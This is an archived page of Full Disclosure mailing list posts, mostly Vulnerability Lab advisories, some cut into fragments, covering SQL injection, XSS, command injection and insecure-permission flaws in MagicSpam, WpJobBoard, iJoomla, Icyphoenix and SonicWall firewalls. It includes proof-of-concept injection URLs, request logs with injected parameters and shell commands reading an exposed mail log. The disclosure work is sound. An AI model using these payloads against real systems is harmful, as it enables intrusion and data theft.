Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] MagicSpam 2.0.13 - Insecure File Permission Vulnerability

2018-01-12 Thread Vulnerability Lab 
Document Title:
===
MagicSpam 2.0.13 - Insecure File Permission Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2113


Release Date:
=
2018-01-12


Vulnerability Laboratory ID (VL-ID):

2113


Common Vulnerability Scoring System:

2.8


Vulnerability Class:

Privacy Violation - Information Disclosure


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
MagicSpam comes fully-integrated with any Plesk 12+ package, blocking spam at 
the edge before it gets a chance to be filtered. 
There’s no need to change DNS or MX records. And your protection comes ready to 
go with complete logging, statistics, and custom controls.

(Copy of the Homepage: https://www.plesk.com/extensions/magicspam/ )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a insecure file 
permission vulnerability in the MagicSpam 2.0.13-1 plesk extension.



Vulnerability Disclosure Timeline:
==
2017-01-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

LinuxMagic
Product: MagicSpam - Plesk Extension 2.0.13-1


Exploitation Technique:
===
Remote


Severity Level:
===
Low


Technical Details & Description:

An insecure file permission access vulnerability has been discovered in the 
MagicSpam 2.0.13-1 plesk extension.
The vulnerability allows an attacker to access sensitive information like 
emails without permission or authentication.


Plesk panel features the freemium extension MagicSpam providing 
industry-leading spam protection technologies.
MagicSpam is keeping a detailed log of all e-mail messages processed under 
directory /var/log/magicspam/ in 
Ubuntu installations. A log file is created with the name mslog, with readable 
permissions for everyone, and rotated daily. 
The file will reveal the full list of mailboxes on the server (provided they 
received or sent at least one message in the past).

The security risk of the permission vulnerability is estimated as low with a 
common vulnerability scoring system count of 2.8. 
Successful exploitation of the file permission security vulnerability results 
in information disclosure of emails.


Proof of Concept (PoC):
===
The insecure file permission vulnerability can be exploited by remote attackers 
without user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

$ id
uid=1002(marco) gid=1011(marco) groups=1011(marco)
$ cd /var/log/magicspam/
$ ls -l
-rw-r--r-- 1 magicspam root 348937 Jan 10 11:50 mslog
$ tail -n1 mslog
2018-01-10 11:51:26 magicspam-daemon[335]: HAM: 
mua=no,ip=[93.94.32.17:mail15.clab99a.contactlab.it],helo=,from=<564020151.35960.1000...@t.contactlab.it>,rcpt=


Solution - Fix & Patch:
===
The security vulnerability can be resolved byan exclude of the emails in the 
list of the affected application log files.
Another solution could be to integration an authentication mechanism  for the 
log file of the magic spam web-application.


Security Risk:
==
The security risk of the insecure file permission vulnerability in the plesk 
extension magic spam is estimated as medium (CVSS 2.8).


Credits & Authors:
==
Marco Marsala [ma...@thenetworksolution.it] - 
https://www.vulnerability-lab.com/show.php?user=Marco+Marsala


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, inv

[FD] Flash Operator Panel v2.31.03 - Command Execution Vulnerability

2018-01-12 Thread Vulnerability Lab 
llforward&command


Solution - Fix & Patch:
===
The command injection web vulnerability can be patched by a secure approval of 
the command parameter in the index.php file GET method request. 
Sanitize the command path variable and disallow the usage of special chars to 
prevent further command injection attacks.


Security Risk:
==
The security risk of the command injection vulnerability via path variable in 
the web-application is estimated as high (CVSS 6.2).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WpJobBoard v4.4.4 - Multiple SQL Injection Vulnerabilities

2018-01-06 Thread Vulnerability Lab 
(1%3D2%2C1%2C(SELECT+1+UNION+SELECT+5))>
https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-alerts&action=index&filter=all&sort=job_title+desc%2C+IF(1%3D2%2C1%2C(SELECT+1+UNION+SELECT+5))&order=asc>




--- PoC Error Exception Logs ---
Fatal error: Uncaught exception
'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near ''' at line 1
-
Fatal error: Uncaught exception 'wp_wpjb_job' with message 
'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near ''' at line 1


Reference(s):
https://wp-jobboard.localhost:8080/
https://wp-jobboard.localhost:8080/wp-admin/
https://wp-jobboard.localhost:8080/wp-admin/admin.php
https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-alerts&action=index&filter=all&sort=
https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-job&action=index&filter=1&sort=job_expires_at&order=


Solution - Fix & Patch:
===
The vulnerability can be patched by a restriction of the vulnerable sort and 
order parameters in the web-applicatoon GET method request.
Disallow the usage of special chars to prevent malicious inputs and use a 
prepared statement to resolve the sql-injection vulnerability.
Disallow to display errors by default configuration and include an 
exception-handling to cover further malicious attacks.


Note: The sql-injections has been prevented in the version 4.9.1 up to the 
latest released version 5.1 of the wpjobboard wordpress web-application plugin.


Security Risk:
==
The security risk of the remote sql-injection web vulnerabilities in the 
wpjobboard web-application is estimated as high (CVSS 6.0).


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=====
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities

2018-01-06 Thread Vulnerability Lab 
dapUsrGrpMbrAttr[member]
  ldapUsrGrpMbrType[0]
  ldapUsrGrpOtherMatchAttr[primaryGroupToken]
  cbox_ldapUsrUseOtherGrpAttr[]
  ldapUsrDomain[sjcolo.local]
  usrTreesSel[MALICIOUS PAYLOAD INJECT!]
  ldapTreesAutoConfDomain[]
  ldapAllowReferrals_0[on]
  ldapAllowReferrals_1[on]
  ldapAllowReferrals_2[on]
  ldapAllowReferrals_3[on]
  cbox_ldapAllowReferrals_0[]
  cbox_ldapAllowReferrals_1[]
  cbox_ldapAllowReferrals_2[]
  cbox_ldapAllowReferrals_3[]
  userRadiusCheckLocal[on]
  userRadiusUserGrpsLocal[on]
  selDfltUserGroup[2]
  ldapUsrGrpMirroring[on]
  ldapUsrGrpMirrorPeriod[x]
  ldapUsrGrpMirrorWhat[0]
  cbox_userRadiusCheckLocal[]
  cbox_userRadiusUserGrpsLocal[]
  cbox_ldapUsrGrpMirroring[]
  ldapRelayEnable[on]
  ldapRelayOnLAN[on]
  ldapRelayOnWAN[on]
  ldapRelayOnVPN[on]
  ldapRelaySecret[]
  ldapRelayLegacyVpnUsrGrp[]
  ldapRelayLegacyVpnClientGrp[]
  ldapRelayLegacyL2TPUsrGrp[]
  ldapRelayLegacyInetUsrGrp[]
  ldapRelayHashSecret[]
  cbox_ldapRelayEnable[]
  cbox_ldapRelayOnLAN[]
  cbox_ldapRelayOnWAN[]
  cbox_ldapRelayOnDMZ[]
  cbox_ldapRelayOnWLAN[]
  cbox_ldapRelayOnVPN[]
  Radius_user[]
  Radius_passwd[]
  remAuthTstProtocol[0]
  TestInfo[]
  remAuthTstType[-1]
  rNum[28F5903AD031CF055855192B2F30CC6E]
  testType[1]
  testDesc[LDAP+server]
  ldapUsrsTree_1[MALICIOUS PAYLOAD INJECT!]
   Response Header:
  Server[localhost]
Expires[-1]
  Content-Type[text/html;charset=UTF-8]
-
Status: 200[OK]
GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!]
Mime Type[unknown]
   Request Header:
  Host[utm_waf.localhost:8512]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  Referer[https://utm_waf.localhost:8512/ssoAuthProps.html]
  Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 
777=0; 7510=0]


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://utm_waf.localhost:8512/main.cgi
Mime Type[text/html]
   Request Header:
  Host[utm_waf.localhost:8512]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://utm_waf.localhost:8512/addServiceObjDlg.html]
  Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 
777=2; 7510=0]
  Connection[keep-alive]
POST-Daten:
  csrfToken[]
  svcObjId_-1[MALICIOUS INJECTED PAYLOAD!]
  svcObjType_-1[1]
  svcObjProperties_-1[4878]
  svcObjIpType_-1[ssh]
  svcObjPort1_-1[1]
  svcObjPort2_-1[1]
  svcObjManagement_-1[0]
  svcObjHigherPrecedence_-1[0]
Response Header:
  Server[localhost]
  Content-Type[text/html;charset=UTF-8]
-
Status: 200[OK]
GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!]
Mime Type[text/html]
   Request Header:
  Host[utm_waf.localhost:8512]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Referer[https://utm_waf.sonicwall:8512/ssoAuthProps.html]
  Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 
777=3; 7510=0]
  Connection[keep-alive]
Response Header:
  Server[SonicWALL]
  Content-Type[text/html;charset=UTF-8]


Reference(s):
https://utm_waf.sonicwall:8512/
https://utm_waf.localhost:8512/main.cgi
https://utm_waf.localhost:8512/ldapProps.html
https://utm_waf.sonicwall:8512/ssoAuthProps.html
https://utm_waf.localhost:8512/addServiceObjDlg.html


Solution - Fix & Patch:
===
The vulnerability can be patched by a parse and encode of the vulnerable `Host 
Name / IP Address`, `Client Name/IP Address` and 
`Proxy Forward To` input fields. Encode the following values 
`ldapServerBindName - usrTreesSel - ldapUsrsTree_1` and `svcObjId` 
to prevent an inject via POST method. Restrict the input fields and disallow 
the usage of special chars. Encode in the last step 
the output listing locations in the `SSO Agents `,`Terminal Services Agent 
Settings` and `RADIUS Accounting Single-Sign-On` 
modules to prevent the execution points of the vulnerabilities. Adjust the 
filter procedure and setup a more seure 
exception-handling to interact during an invalid execution or unhandled 
exception.

Note: All the security issues are marked as resolved by dell sonicwall with 
several updates until 2017 Q4.


Security Risk:
==
The security risk of the application-side input validation web vulnerability 
and the filter bypass issue are estimated as medium. (CVSS 4.5)


Credits & Authors:
======
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Be

[FD] Wickr Inc - App Clock & Message Deletion Glitch P2 - Bug Bounty

2018-01-06 Thread Vulnerability Lab 
Wickr Inc - App Clock & Message Deletion Glitch P2  - Bug Bounty
(Document) [PDF]

URL: https://www.vulnerability-lab.com/get_content.php?id=2107

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/01/04/wickr-inc-app-clock-message-deletion-glitch

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] iJoomla com_adagency 6.0.9 - SQL Injection Vulnerabilities

2018-01-04 Thread Vulnerability Lab 
vertis.user_id, user.name, user.email, user.block, 
user.username, user.registerDate, count(c.id) count FROM 
#__ad_agency_advertis as advertis LEFT OUTER JOIN #__users as user on 
user.id=advertis.user_id LEFT JOIN #__ad_agency_campaign as c on 
c.aid=advertis.aid WHERE 1=1 AND user.id<>'' AND advertis.approved LIKE 
'%-1'Y%' GROUP BY advertis.aid ORDER BY advertis.ordering ASC
-
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 
''Y-1'' AND cb.`campaign_id`=3 GROUP BY b.id ORDE' at line 15 SQL=SELECT b . * 
, camp.id campaign_id, camp.name campaign_name, a.aid AS 
advertiser_id2, a.company AS advertiser, concat( width, 'x', height ) AS 
size_type, m.id mid, m.title zone_name FROM #__ad_agency_banners 
AS b LEFT OUTER JOIN #__ad_agency_advertis AS a ON b.advertiser_id = a.aid LEFT 
JOIN #__ad_agency_campaign_banner AS cb ON cb.banner_id = 
b.id LEFT JOIN #__ad_agency_campaign AS camp ON camp.id = cb.campaign_id LEFT 
JOIN #__ad_agency_order_type AS p ON camp.otid = p.tid LEFT 
JOIN #__modules AS m ON m.id = cb.zone WHERE 1=1 AND b.approved = 'Y-1'' AND 
cb.`campaign_id`=3 GROUP BY b.id ORDER BY b.ordering ASC , 
b.id DESC LIMIT 0,30


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET 
http://joomla.localhost:8080/index.php?option=com_adagency&controller=adagencyAds&status_select=Y-1%27[SQL-INJECTION
 VULNERABILITY!]**&camp_id=3
Mime Type[text/html]
   Request Header:
  Host[joomla.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 
Firefox/48.0]
  Cookie[dacce502d8fa40f12fdba764da41b8cf=8uusag3vgk0544u8phf9c4oa11; 
currentURI=http%3A%2F%2Fjoomla.localhost:8080%2F; 
em_cdn_uid=t%3D1471798050244%26u%3D11f009a55e864578928adec2c70fa876; 
350a4e86045327a856d5c0333a428604=ukf6ldgrs5ekdrukh8p8s422k0; activeProfile=0]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache]
  X-Powered-By[PHP/7.0.9]
  P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET 
http://joomla.localhost:8080/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status=-1%27Y[SQL-INJECTION
 VULNERABILITY!]** 
Mime Type[text/html]
   Request Header:
  Host[joomla.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 
Firefox/48.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Cookie[jsju=0; 
dacce502d8fa40f12fdba764da41b8cf=8uusag3vgk0544u8phf9c4oa11; 
currentURI=http%3A%2F%2Fjoomla.localhost:8080%2F; 
em_cdn_uid=t%3D1471798050244%26u%3D11f009a55e864578928adec2c70fa876; 
350a4e86045327a856d5c0333a428604=ivi4d2j9782af9h0kntmqi6m43; 
activeProfile=0]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache]
  X-Powered-By[PHP/7.0.9]
  P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]


Reference(s):
http://joomla.localhost:8080/
http://joomla.localhost:8080/index.php
http://joomla.localhost:8080/index.php?option=
http://joomla.localhost:8080/index.php?option=com_adagency
http://joomla.localhost:8080/index.php?option=com_adagency&controller
http://joomla.localhost:8080/index.php?option=com_adagency&controller=adagencyAdvertisers
http://joomla.localhost:8080/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status
http://joomla.localhost:8080/administrator/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure parse and restriction of the 
vulnerable `advertiser_status` and `status_select` parameters  in 
the com_adagency component. Disallow the usage of special chars, escape the 
entries and use a prepared statement to prevent exploitation 
of the vulnerabilities.

Note: The vulnerability has been resolved in the last com_adagency component 
updates in 2017 Q1-4.


Security Risk:
==
The security risk of the remote sql injection web vulnerabilities in the 
com_adagency 6.0.9 joomla component is estimated as high (CVSS 7.1).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purp

[FD] Icyphoenix 2.2.0.105 - Multiple SQL Injection Vulnerabilities

2018-01-04 Thread Vulnerability Lab 
Solution - Fix & Patch:
===
Escape and parse the vulnerable parameters and use a prepared statment to 
protect the sql query. 
Restrict the input and filter to disallow the usage of special chars to prevent 
further attacks.
Disallow to display the sql error logs by deactivate of the function for the 
default cms configuration.

Note: The issues are known as resolved within the last version updates during 
2017.


Security Risk:
==
The security risk of the remote sql-injection vulnerabilities in the content 
management system are estimated as medium (CVSS 5.0).


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SonicWall SonicOS NSA UTM Firewall - Bypass & Persistent Vulnerability

2018-01-04 Thread Vulnerability Lab 
22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B]
  refresh_page[securityServicesCFView.html]
  tableIndex[-1]
  cgiaction[%5Bobject+Window%5D]


--- PoC Session Logs (POST) [Inject] #2 ---
Status: pending[]
POST https://utm_waf.sonicwall.localhost:8351/main.cgi 
Mime Type[unknown]
   Request Header:
  Host[utm_waf.sonicwall.localhost:8351]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  Referer[https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html]
  Cookie[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 
1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 
1042=0; 1043=0; 1044=0; 
1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; 
tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 
2040=%7B%22refreshTime%22%3A3%2C%22
showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C
%22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22
viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C
%22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22
connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C
%22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends
%22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C
%22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart
%22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C
%22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors
%22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C
%22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23D9%22%5D%2C%22rtDataColors
%22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%2333%22%2C
%22%23A65628%22%2C%22%23F781BF%22%2C%22%2399%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB80
24%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C
%22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D]
POST-Daten:
  csrfToken[???]
  inputbox[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
  list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
  gav_cloud_exclude_list[123123123+%22%3E%3CMALIICOUS INJECTED 
PAYLOAD!+src%3Da%3E]
  gav_cloud_refresh_exclusions[]
  refresh_page[gav_cloud.html]
  isobject[1]
  cgiaction[%5Bobject+Window%5D]


Reference(s):
https://utm_waf.sonicwall.localhost:8351/main.cgi
https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html
https://utm_waf.sonicwall.localhost:8351/addTrustedDomainDlg.html


Solution - Fix & Patch:
===
The vulnerability can be patched by setting up a secure validation for the 
update inputbox save procedure. Use the same as on the add procedure.
Encode the context and disallow usage of special chars in the item list when 
processing to add. Parse the context and filter the input next to 
the permanent save that finally displays the context in the main item list to 
prevent an application-side script code execution.

Note: The vulnerabilities has been reported to the dell security team. The 
issue has been resolved to 2016Q4 - 2017Q4 by the sonicwall developers.


Security Risk:
==
The security risk of the application-side input validation web vulnerability 
and the filter bypass issue are estimated as medium (CVSS 4.5).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allo

[FD] SEC Consult SA-20171213-0 :: VPN credentials disclosure in Fortinet FortiClient

2017-12-13 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20171213-0 >
===
  title: VPN credentials disclosure
product: Fortinet FortiClient
